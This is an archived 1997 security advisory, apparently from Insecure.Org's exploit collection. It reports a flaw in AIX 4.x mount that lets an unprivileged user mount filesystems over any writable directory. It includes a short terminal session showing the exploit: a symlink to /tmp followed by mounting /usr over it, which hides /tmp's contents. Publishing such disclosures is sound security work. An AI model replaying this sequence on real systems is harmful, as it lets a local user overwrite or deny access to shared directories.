AIX mount has a serious problem that allows people to mount any filesystem on top of any writeable space.
"S. Ryan Quick" <ryan@PHAEDO.COM>
Mount filesystems on top of any writeable space (this could allow you to clobber files, among other things).
AIX 4.1.3, 4.1.4, 4.2.0, 4.2.1
28 December 1997
Date: Sun, 28 Dec 1997 22:26:17 -0500
From: "S. Ryan Quick" <ryan@PHAEDO.COM>
Subject: AIX 4.x Mount
-----BEGIN PGP SIGNED MESSAGE-----
My apologies if this is known already . . . however, I've seen nothing about
it and it does concern me. I have verified a problem with mount on AIX 4.1.3,
4.1.4, 4.2.0, and 4.2.1 which allows a normal user to mount any filesystem
(including those already mounted by the system) on top of any writable
space. Immediately, as the script below shows, this allows a user to
overwrite the contents of 777 directories with whatever files one wants.
(e.g. Removing access to temporary files in /tmp) . . .
sapphire /home/rquick > oslevel
sapphire /home/rquick > who am i
sapphire /home/rquick > id
sapphire /home/rquick > ln -s /tmp mnt
sapphire /home/rquick > mount /usr mnt
sapphire /home/rquick > cd /tmp
sapphire /tmp > ls
OV dict include lpd sbin ucb
adm dt lbin lpp share usg
bin ebt lib man spool
ccs eligibility local pub sys
common etc lost+found samples tmp
sapphire /tmp > cd
sapphire /home/rquick > umount mnt
sapphire /home/rquick >
I have notified IBM of the problem . . . they have yet to respond.
S. Ryan Quick
UNIX Systems Engineer
Phaedo Consulting, Inc.
-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces: